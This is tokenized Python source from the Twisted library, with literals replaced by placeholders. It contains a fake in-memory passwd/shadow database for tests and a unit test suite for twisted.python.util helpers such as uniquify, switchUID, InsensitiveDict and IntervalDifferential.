<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import , division <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> class _UserRecord ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name , password , uid , gid , gecos , home , shell ) : <EOL> self . pw_name = name <EOL> self . pw_passwd = password <EOL> self . pw_uid = uid <EOL> self . pw_gid = gid <EOL> self . pw_gecos = gecos <EOL> self . pw_dir = home <EOL> self . pw_shell = shell <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:7> <EOL> def __getitem__ ( self , index ) : <EOL> return ( <EOL> self . pw_name , self . pw_passwd , self . pw_uid , <EOL> self . pw_gid , self . pw_gecos , self . pw_dir , self . pw_shell ) [ index ] <EOL> class UserDatabase ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . _users = [ ] <EOL> def addUser ( self , username , password , uid , gid , gecos , home , shell ) : <EOL> """<STR_LIT>""" <EOL> self . _users . append ( _UserRecord ( <EOL> username , password , uid , gid , gecos , home , shell ) ) <EOL> def getpwuid ( self , uid ) : <EOL> """<STR_LIT>""" <EOL> for entry in self . _users : <EOL> if entry . pw_uid == uid : <EOL> return entry <EOL> raise KeyError ( ) <EOL> def getpwnam ( self , name ) : <EOL> """<STR_LIT>""" <EOL> for entry in self . _users : <EOL> if entry . pw_name == name : <EOL> return entry <EOL> raise KeyError ( ) <EOL> def getpwall ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _users <EOL> class _ShadowRecord ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , username , password , lastChange , min , max , warn , inact , <EOL> expire , flag ) : <EOL> self . sp_nam = username <EOL> self . sp_pwd = password <EOL> self . sp_lstchg = lastChange <EOL> self . sp_min = min <EOL> self . sp_max = max <EOL> self . sp_warn = warn <EOL> self . sp_inact = inact <EOL> self . sp_expire = expire <EOL> self . 
sp_flag = flag <EOL> def __len__ ( self ) : <EOL> return <NUM_LIT:9> <EOL> def __getitem__ ( self , index ) : <EOL> return ( <EOL> self . sp_nam , self . sp_pwd , self . sp_lstchg , self . sp_min , <EOL> self . sp_max , self . sp_warn , self . sp_inact , self . sp_expire , <EOL> self . sp_flag ) [ index ] <EOL> class ShadowDatabase ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . _users = [ ] <EOL> def addUser ( self , username , password , lastChange , min , max , warn , inact , <EOL> expire , flag ) : <EOL> """<STR_LIT>""" <EOL> self . _users . append ( _ShadowRecord ( <EOL> username , password , lastChange , <EOL> min , max , warn , inact , expire , flag ) ) <EOL> def getspnam ( self , username ) : <EOL> """<STR_LIT>""" <EOL> for entry in self . _users : <EOL> if entry . sp_nam == username : <EOL> return entry <EOL> raise KeyError <EOL> def getspall ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _users </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division , absolute_import <EOL> import errno <EOL> import os . path <EOL> import shutil <EOL> import sys <EOL> import warnings <EOL> try : <EOL> import pwd , grp <EOL> except ImportError : <EOL> pwd = grp = None <EOL> from twisted . trial import unittest <EOL> from twisted . trial . util import suppress as SUPPRESS <EOL> from twisted . python import util <EOL> from twisted . python . reflect import fullyQualifiedName <EOL> from twisted . python . filepath import FilePath <EOL> from twisted . internet import reactor <EOL> from twisted . internet . interfaces import IReactorProcess <EOL> from twisted . internet . protocol import ProcessProtocol <EOL> from twisted . internet . defer import Deferred <EOL> from twisted . internet . error import ProcessDone <EOL> from twisted . test . test_process import MockOS <EOL> pyExe = FilePath ( sys . executable ) . _asBytesPath ( ) <EOL> class UtilTests ( unittest . TestCase ) : <EOL> def testUniq ( self ) : <EOL> l = [ "<STR_LIT:a>" , <NUM_LIT:1> , "<STR_LIT>" , "<STR_LIT:a>" , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:6> ] <EOL> self . assertEqual ( util . uniquify ( l ) , [ "<STR_LIT:a>" , <NUM_LIT:1> , "<STR_LIT>" , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:2> , <NUM_LIT:6> ] ) <EOL> def testRaises ( self ) : <EOL> self . assertTrue ( util . raises ( ZeroDivisionError , divmod , <NUM_LIT:1> , <NUM_LIT:0> ) ) <EOL> self . assertFalse ( util . raises ( ZeroDivisionError , divmod , <NUM_LIT:0> , <NUM_LIT:1> ) ) <EOL> try : <EOL> util . raises ( TypeError , divmod , <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> except ZeroDivisionError : <EOL> pass <EOL> else : <EOL> raise unittest . FailTest ( "<STR_LIT>" ) <EOL> def test_uidFromNumericString ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( util . 
uidFromString ( "<STR_LIT:100>" ) , <NUM_LIT:100> ) <EOL> def test_uidFromUsernameString ( self ) : <EOL> """<STR_LIT>""" <EOL> pwent = pwd . getpwuid ( os . getuid ( ) ) <EOL> self . assertEqual ( util . uidFromString ( pwent . pw_name ) , pwent . pw_uid ) <EOL> if pwd is None : <EOL> test_uidFromUsernameString . skip = ( <EOL> "<STR_LIT>" ) <EOL> def test_gidFromNumericString ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertEqual ( util . gidFromString ( "<STR_LIT:100>" ) , <NUM_LIT:100> ) <EOL> def test_gidFromGroupnameString ( self ) : <EOL> """<STR_LIT>""" <EOL> grent = grp . getgrgid ( os . getgid ( ) ) <EOL> self . assertEqual ( util . gidFromString ( grent . gr_name ) , grent . gr_gid ) <EOL> if grp is None : <EOL> test_gidFromGroupnameString . skip = ( <EOL> "<STR_LIT>" ) <EOL> class NameToLabelTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_nameToLabel ( self ) : <EOL> """<STR_LIT>""" <EOL> nameData = [ <EOL> ( '<STR_LIT:f>' , '<STR_LIT:F>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:foo>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> for inp , out in nameData : <EOL> got = util . nameToLabel ( inp ) <EOL> self . assertEqual ( <EOL> got , out , <EOL> "<STR_LIT>" % ( inp , got , out ) ) <EOL> class UntilConcludesTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_uninterruptably ( self ) : <EOL> """<STR_LIT>""" <EOL> def f ( a , b ) : <EOL> self . calls += <NUM_LIT:1> <EOL> exc = self . exceptions . pop ( ) <EOL> if exc is not None : <EOL> raise exc ( errno . EINTR , "<STR_LIT>" ) <EOL> return a + b <EOL> self . exceptions = [ None ] <EOL> self . calls = <NUM_LIT:0> <EOL> self . assertEqual ( util . untilConcludes ( f , <NUM_LIT:1> , <NUM_LIT:2> ) , <NUM_LIT:3> ) <EOL> self . assertEqual ( self . calls , <NUM_LIT:1> ) <EOL> self . exceptions = [ None , OSError , IOError ] <EOL> self . calls = <NUM_LIT:0> <EOL> self . assertEqual ( util . 
untilConcludes ( f , <NUM_LIT:2> , <NUM_LIT:3> ) , <NUM_LIT:5> ) <EOL> self . assertEqual ( self . calls , <NUM_LIT:3> ) <EOL> class SwitchUIDTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> if getattr ( os , "<STR_LIT>" , None ) is None : <EOL> skip = "<STR_LIT>" <EOL> def setUp ( self ) : <EOL> self . mockos = MockOS ( ) <EOL> self . patch ( util , "<STR_LIT>" , self . mockos ) <EOL> self . patch ( util , "<STR_LIT>" , self . initgroups ) <EOL> self . initgroupsCalls = [ ] <EOL> def initgroups ( self , uid , gid ) : <EOL> """<STR_LIT>""" <EOL> self . initgroupsCalls . append ( ( uid , gid ) ) <EOL> def test_uid ( self ) : <EOL> """<STR_LIT>""" <EOL> util . switchUID ( <NUM_LIT> , None ) <EOL> self . assertEqual ( self . initgroupsCalls , [ ( <NUM_LIT> , None ) ] ) <EOL> self . assertEqual ( self . mockos . actions , [ ( "<STR_LIT>" , <NUM_LIT> ) ] ) <EOL> def test_euid ( self ) : <EOL> """<STR_LIT>""" <EOL> util . switchUID ( <NUM_LIT> , None , True ) <EOL> self . assertEqual ( self . initgroupsCalls , [ ( <NUM_LIT> , None ) ] ) <EOL> self . assertEqual ( self . mockos . seteuidCalls , [ <NUM_LIT> ] ) <EOL> def test_currentUID ( self ) : <EOL> """<STR_LIT>""" <EOL> uid = self . mockos . getuid ( ) <EOL> util . switchUID ( uid , None ) <EOL> self . assertEqual ( self . initgroupsCalls , [ ] ) <EOL> self . assertEqual ( self . mockos . actions , [ ] ) <EOL> currentWarnings = self . flushWarnings ( [ util . switchUID ] ) <EOL> self . assertEqual ( len ( currentWarnings ) , <NUM_LIT:1> ) <EOL> self . assertIn ( '<STR_LIT>' % uid , <EOL> currentWarnings [ <NUM_LIT:0> ] [ '<STR_LIT:message>' ] ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' % uid , currentWarnings [ <NUM_LIT:0> ] [ '<STR_LIT:message>' ] ) <EOL> def test_currentEUID ( self ) : <EOL> """<STR_LIT>""" <EOL> euid = self . mockos . geteuid ( ) <EOL> util . switchUID ( euid , None , True ) <EOL> self . assertEqual ( self . initgroupsCalls , [ ] ) <EOL> self . assertEqual ( self . mockos . 
seteuidCalls , [ ] ) <EOL> currentWarnings = self . flushWarnings ( [ util . switchUID ] ) <EOL> self . assertEqual ( len ( currentWarnings ) , <NUM_LIT:1> ) <EOL> self . assertIn ( '<STR_LIT>' % euid , <EOL> currentWarnings [ <NUM_LIT:0> ] [ '<STR_LIT:message>' ] ) <EOL> self . assertIn ( <EOL> '<STR_LIT>' % euid , currentWarnings [ <NUM_LIT:0> ] [ '<STR_LIT:message>' ] ) <EOL> class MergeFunctionMetadataTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_mergedFunctionBehavesLikeMergeTarget ( self ) : <EOL> """<STR_LIT>""" <EOL> foo_object = object ( ) <EOL> bar_object = object ( ) <EOL> def foo ( ) : <EOL> return foo_object <EOL> def bar ( x , y , ab , c = <NUM_LIT:10> , * d , ** e ) : <EOL> ( a , b ) = ab <EOL> return bar_object <EOL> baz = util . mergeFunctionMetadata ( foo , bar ) <EOL> self . assertIdentical ( baz ( <NUM_LIT:1> , <NUM_LIT:2> , ( <NUM_LIT:3> , <NUM_LIT:4> ) , quux = <NUM_LIT:10> ) , bar_object ) <EOL> def test_moduleIsMerged ( self ) : <EOL> """<STR_LIT>""" <EOL> def foo ( ) : <EOL> pass <EOL> def bar ( ) : <EOL> pass <EOL> bar . __module__ = '<STR_LIT>' <EOL> baz = util . mergeFunctionMetadata ( foo , bar ) <EOL> self . assertEqual ( baz . __module__ , foo . __module__ ) <EOL> def test_docstringIsMerged ( self ) : <EOL> """<STR_LIT>""" <EOL> def foo ( ) : <EOL> """<STR_LIT>""" <EOL> def bar ( ) : <EOL> """<STR_LIT>""" <EOL> baz = util . mergeFunctionMetadata ( foo , bar ) <EOL> self . assertEqual ( baz . __doc__ , foo . __doc__ ) <EOL> def test_nameIsMerged ( self ) : <EOL> """<STR_LIT>""" <EOL> def foo ( ) : <EOL> pass <EOL> def bar ( ) : <EOL> pass <EOL> baz = util . mergeFunctionMetadata ( foo , bar ) <EOL> self . assertEqual ( baz . __name__ , foo . __name__ ) <EOL> def test_instanceDictionaryIsMerged ( self ) : <EOL> """<STR_LIT>""" <EOL> def foo ( ) : <EOL> pass <EOL> foo . a = <NUM_LIT:1> <EOL> foo . b = <NUM_LIT:2> <EOL> def bar ( ) : <EOL> pass <EOL> bar . b = <NUM_LIT:3> <EOL> bar . 
c = <NUM_LIT:4> <EOL> baz = util . mergeFunctionMetadata ( foo , bar ) <EOL> self . assertEqual ( foo . a , baz . a ) <EOL> self . assertEqual ( foo . b , baz . b ) <EOL> self . assertEqual ( bar . c , baz . c ) <EOL> class OrderedDictTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_deprecated ( self ) : <EOL> """<STR_LIT>""" <EOL> from twisted . python . util import OrderedDict <EOL> OrderedDict <EOL> currentWarnings = self . flushWarnings ( offendingFunctions = [ <EOL> self . test_deprecated ] ) <EOL> self . assertEqual ( <EOL> currentWarnings [ <NUM_LIT:0> ] [ '<STR_LIT:message>' ] , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> self . assertEqual ( currentWarnings [ <NUM_LIT:0> ] [ '<STR_LIT>' ] , DeprecationWarning ) <EOL> self . assertEqual ( len ( currentWarnings ) , <NUM_LIT:1> ) <EOL> class InsensitiveDictTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_preserve ( self ) : <EOL> """<STR_LIT>""" <EOL> dct = util . InsensitiveDict ( { '<STR_LIT>' : '<STR_LIT:bar>' , <NUM_LIT:1> : <NUM_LIT:2> , '<STR_LIT>' : { <NUM_LIT:1> : <NUM_LIT:2> } } , preserve = <NUM_LIT:1> ) <EOL> self . assertEqual ( dct [ '<STR_LIT>' ] , { <NUM_LIT:1> : <NUM_LIT:2> } ) <EOL> self . assertEqual ( dct [ '<STR_LIT:foo>' ] , '<STR_LIT:bar>' ) <EOL> self . assertEqual ( dct . copy ( ) , dct ) <EOL> self . assertEqual ( dct [ '<STR_LIT:foo>' ] , dct . get ( '<STR_LIT>' ) ) <EOL> self . assertIn ( <NUM_LIT:1> , dct ) <EOL> self . assertIn ( '<STR_LIT:foo>' , dct ) <EOL> result = eval ( repr ( dct ) , { <EOL> '<STR_LIT>' : dct , <EOL> '<STR_LIT>' : util . InsensitiveDict , <EOL> } ) <EOL> self . assertEqual ( result , dct ) <EOL> keys = [ '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:1> ] <EOL> for x in keys : <EOL> self . assertIn ( x , dct . keys ( ) ) <EOL> self . assertIn ( ( x , dct [ x ] ) , dct . items ( ) ) <EOL> self . assertEqual ( len ( keys ) , len ( dct ) ) <EOL> del dct [ <NUM_LIT:1> ] <EOL> del dct [ '<STR_LIT:foo>' ] <EOL> self . 
assertEqual ( dct . keys ( ) , [ '<STR_LIT>' ] ) <EOL> def test_noPreserve ( self ) : <EOL> """<STR_LIT>""" <EOL> dct = util . InsensitiveDict ( { '<STR_LIT>' : '<STR_LIT:bar>' , <NUM_LIT:1> : <NUM_LIT:2> , '<STR_LIT>' : { <NUM_LIT:1> : <NUM_LIT:2> } } , preserve = <NUM_LIT:0> ) <EOL> keys = [ '<STR_LIT:foo>' , '<STR_LIT>' , <NUM_LIT:1> ] <EOL> for x in keys : <EOL> self . assertIn ( x , dct . keys ( ) ) <EOL> self . assertIn ( ( x , dct [ x ] ) , dct . items ( ) ) <EOL> self . assertEqual ( len ( keys ) , len ( dct ) ) <EOL> del dct [ <NUM_LIT:1> ] <EOL> del dct [ '<STR_LIT:foo>' ] <EOL> self . assertEqual ( dct . keys ( ) , [ '<STR_LIT>' ] ) <EOL> def test_unicode ( self ) : <EOL> """<STR_LIT>""" <EOL> d = util . InsensitiveDict ( preserve = False ) <EOL> d [ u"<STR_LIT>" ] = <NUM_LIT:1> <EOL> self . assertEqual ( d [ u"<STR_LIT>" ] , <NUM_LIT:1> ) <EOL> self . assertEqual ( d . keys ( ) , [ u"<STR_LIT:foo>" ] ) <EOL> def test_bytes ( self ) : <EOL> """<STR_LIT>""" <EOL> d = util . InsensitiveDict ( preserve = False ) <EOL> d [ b"<STR_LIT>" ] = <NUM_LIT:1> <EOL> self . assertEqual ( d [ b"<STR_LIT>" ] , <NUM_LIT:1> ) <EOL> self . assertEqual ( d . keys ( ) , [ b"<STR_LIT:foo>" ] ) <EOL> class PasswordTestingProcessProtocol ( ProcessProtocol ) : <EOL> """<STR_LIT>""" <EOL> def connectionMade ( self ) : <EOL> self . output = [ ] <EOL> self . transport . write ( b'<STR_LIT>' ) <EOL> def childDataReceived ( self , fd , output ) : <EOL> self . output . append ( ( fd , output ) ) <EOL> def processEnded ( self , reason ) : <EOL> self . finished . callback ( ( reason , self . output ) ) <EOL> class GetPasswordTests ( unittest . TestCase ) : <EOL> if not IReactorProcess . providedBy ( reactor ) : <EOL> skip = "<STR_LIT>" <EOL> def test_stdin ( self ) : <EOL> """<STR_LIT>""" <EOL> p = PasswordTestingProcessProtocol ( ) <EOL> p . finished = Deferred ( ) <EOL> reactor . 
spawnProcess ( <EOL> p , pyExe , <EOL> [ pyExe , <EOL> b'<STR_LIT:-c>' , <EOL> ( b'<STR_LIT>' <EOL> b'<STR_LIT>' <EOL> b'<STR_LIT>' <EOL> b'<STR_LIT>' ) ] , <EOL> env = { b'<STR_LIT>' : os . pathsep . join ( sys . path ) . encode ( "<STR_LIT:utf8>" ) } ) <EOL> def processFinished ( result ) : <EOL> ( reason , output ) = result <EOL> reason . trap ( ProcessDone ) <EOL> self . assertIn ( ( <NUM_LIT:1> , b'<STR_LIT>' ) , output ) <EOL> return p . finished . addCallback ( processFinished ) <EOL> class SearchUpwardsTests ( unittest . TestCase ) : <EOL> def testSearchupwards ( self ) : <EOL> os . makedirs ( '<STR_LIT>' ) <EOL> open ( '<STR_LIT>' , '<STR_LIT:w>' ) . close ( ) <EOL> open ( '<STR_LIT>' , '<STR_LIT:w>' ) . close ( ) <EOL> open ( '<STR_LIT>' , '<STR_LIT:w>' ) . close ( ) <EOL> os . mkdir ( '<STR_LIT>' ) <EOL> os . mkdir ( '<STR_LIT>' ) <EOL> os . mkdir ( '<STR_LIT>' ) <EOL> os . mkdir ( '<STR_LIT>' ) <EOL> actual = util . searchupwards ( '<STR_LIT>' , <EOL> files = [ '<STR_LIT>' ] , <EOL> dirs = [ '<STR_LIT:bar>' , '<STR_LIT>' ] ) <EOL> expected = os . path . abspath ( '<STR_LIT>' ) + os . sep <EOL> self . assertEqual ( actual , expected ) <EOL> shutil . rmtree ( '<STR_LIT>' ) <EOL> actual = util . searchupwards ( '<STR_LIT>' , <EOL> files = [ '<STR_LIT>' ] , <EOL> dirs = [ '<STR_LIT:bar>' , '<STR_LIT>' ] ) <EOL> expected = None <EOL> self . assertEqual ( actual , expected ) <EOL> class IntervalDifferentialTests ( unittest . TestCase ) : <EOL> def testDefault ( self ) : <EOL> d = iter ( util . IntervalDifferential ( [ ] , <NUM_LIT:10> ) ) <EOL> for i in range ( <NUM_LIT:100> ) : <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:10> , None ) ) <EOL> def testSingle ( self ) : <EOL> d = iter ( util . IntervalDifferential ( [ <NUM_LIT:5> ] , <NUM_LIT:10> ) ) <EOL> for i in range ( <NUM_LIT:100> ) : <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:5> , <NUM_LIT:0> ) ) <EOL> def testPair ( self ) : <EOL> d = iter ( util . 
IntervalDifferential ( [ <NUM_LIT:5> , <NUM_LIT:7> ] , <NUM_LIT:10> ) ) <EOL> for i in range ( <NUM_LIT:100> ) : <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:5> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:2> , <NUM_LIT:1> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:3> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:4> , <NUM_LIT:1> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:1> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:5> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:4> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:3> , <NUM_LIT:1> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:2> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:5> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:0> , <NUM_LIT:1> ) ) <EOL> def testTriple ( self ) : <EOL> d = iter ( util . IntervalDifferential ( [ <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:5> ] , <NUM_LIT:10> ) ) <EOL> for i in range ( <NUM_LIT:100> ) : <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:2> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:2> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:0> , <NUM_LIT:1> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:1> , <NUM_LIT:2> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:1> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:2> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:0> , <NUM_LIT:1> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:2> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:0> , <NUM_LIT:2> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:2> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:0> , <NUM_LIT:1> ) ) <EOL> self . 
assertEqual ( next ( d ) , ( <NUM_LIT:2> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:1> , <NUM_LIT:2> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:1> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:0> , <NUM_LIT:1> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:2> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:2> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:0> , <NUM_LIT:1> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:0> , <NUM_LIT:2> ) ) <EOL> def testInsert ( self ) : <EOL> d = iter ( util . IntervalDifferential ( [ ] , <NUM_LIT:10> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:10> , None ) ) <EOL> d . addInterval ( <NUM_LIT:3> ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:3> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:3> , <NUM_LIT:0> ) ) <EOL> d . addInterval ( <NUM_LIT:6> ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:3> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:3> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:0> , <NUM_LIT:1> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:3> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:3> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:0> , <NUM_LIT:1> ) ) <EOL> def testRemove ( self ) : <EOL> d = iter ( util . IntervalDifferential ( [ <NUM_LIT:3> , <NUM_LIT:5> ] , <NUM_LIT:10> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:3> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:2> , <NUM_LIT:1> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:1> , <NUM_LIT:0> ) ) <EOL> d . removeInterval ( <NUM_LIT:3> ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:4> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( next ( d ) , ( <NUM_LIT:5> , <NUM_LIT:0> ) ) <EOL> d . removeInterval ( <NUM_LIT:5> ) <EOL> self . 
assertEqual ( next ( d ) , ( <NUM_LIT:10> , None ) ) <EOL> self . assertRaises ( ValueError , d . removeInterval , <NUM_LIT:10> ) <EOL> class Record ( util . FancyEqMixin ) : <EOL> """<STR_LIT>""" <EOL> compareAttributes = ( '<STR_LIT:a>' , '<STR_LIT:b>' ) <EOL> def __init__ ( self , a , b ) : <EOL> self . a = a <EOL> self . b = b <EOL> class DifferentRecord ( util . FancyEqMixin ) : <EOL> """<STR_LIT>""" <EOL> compareAttributes = ( '<STR_LIT:a>' , '<STR_LIT:b>' ) <EOL> def __init__ ( self , a , b ) : <EOL> self . a = a <EOL> self . b = b <EOL> class DerivedRecord ( Record ) : <EOL> """<STR_LIT>""" <EOL> class EqualToEverything ( object ) : <EOL> """<STR_LIT>""" <EOL> def __eq__ ( self , other ) : <EOL> return True <EOL> def __ne__ ( self , other ) : <EOL> return False <EOL> class EqualToNothing ( object ) : <EOL> """<STR_LIT>""" <EOL> def __eq__ ( self , other ) : <EOL> return False <EOL> def __ne__ ( self , other ) : <EOL> return True <EOL> class EqualityTests ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_identity ( self ) : <EOL> """<STR_LIT>""" <EOL> class Empty ( util . FancyEqMixin ) : <EOL> pass <EOL> self . assertFalse ( Empty ( ) == Empty ( ) ) <EOL> self . assertTrue ( Empty ( ) != Empty ( ) ) <EOL> empty = Empty ( ) <EOL> self . assertTrue ( empty == empty ) <EOL> self . assertFalse ( empty != empty ) <EOL> def test_equality ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertTrue ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) == Record ( <NUM_LIT:1> , <NUM_LIT:2> ) ) <EOL> self . assertFalse ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) == Record ( <NUM_LIT:1> , <NUM_LIT:3> ) ) <EOL> self . assertFalse ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) == Record ( <NUM_LIT:2> , <NUM_LIT:2> ) ) <EOL> self . assertFalse ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) == Record ( <NUM_LIT:3> , <NUM_LIT:4> ) ) <EOL> def test_unequality ( self ) : <EOL> """<STR_LIT>""" <EOL> self . 
assertFalse ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) != Record ( <NUM_LIT:1> , <NUM_LIT:2> ) ) <EOL> self . assertTrue ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) != Record ( <NUM_LIT:1> , <NUM_LIT:3> ) ) <EOL> self . assertTrue ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) != Record ( <NUM_LIT:2> , <NUM_LIT:2> ) ) <EOL> self . assertTrue ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) != Record ( <NUM_LIT:3> , <NUM_LIT:4> ) ) <EOL> def test_differentClassesEquality ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertFalse ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) == DifferentRecord ( <NUM_LIT:1> , <NUM_LIT:2> ) ) <EOL> def test_differentClassesInequality ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertTrue ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) != DifferentRecord ( <NUM_LIT:1> , <NUM_LIT:2> ) ) <EOL> def test_inheritedClassesEquality ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertTrue ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) == DerivedRecord ( <NUM_LIT:1> , <NUM_LIT:2> ) ) <EOL> self . assertFalse ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) == DerivedRecord ( <NUM_LIT:1> , <NUM_LIT:3> ) ) <EOL> self . assertFalse ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) == DerivedRecord ( <NUM_LIT:2> , <NUM_LIT:2> ) ) <EOL> self . assertFalse ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) == DerivedRecord ( <NUM_LIT:3> , <NUM_LIT:4> ) ) <EOL> def test_inheritedClassesInequality ( self ) : <EOL> """<STR_LIT>""" <EOL> self . assertFalse ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) != DerivedRecord ( <NUM_LIT:1> , <NUM_LIT:2> ) ) <EOL> self . assertTrue ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) != DerivedRecord ( <NUM_LIT:1> , <NUM_LIT:3> ) ) <EOL> self . assertTrue ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) != DerivedRecord ( <NUM_LIT:2> , <NUM_LIT:2> ) ) <EOL> self . assertTrue ( Record ( <NUM_LIT:1> , <NUM_LIT:2> ) != DerivedRecord ( <NUM_LIT:3> , <NUM_LIT:4> ) ) <EOL> def test_rightHandArgumentImplementsEquality ( self ) : <EOL> """<STR_LIT>""" <EOL> self . 
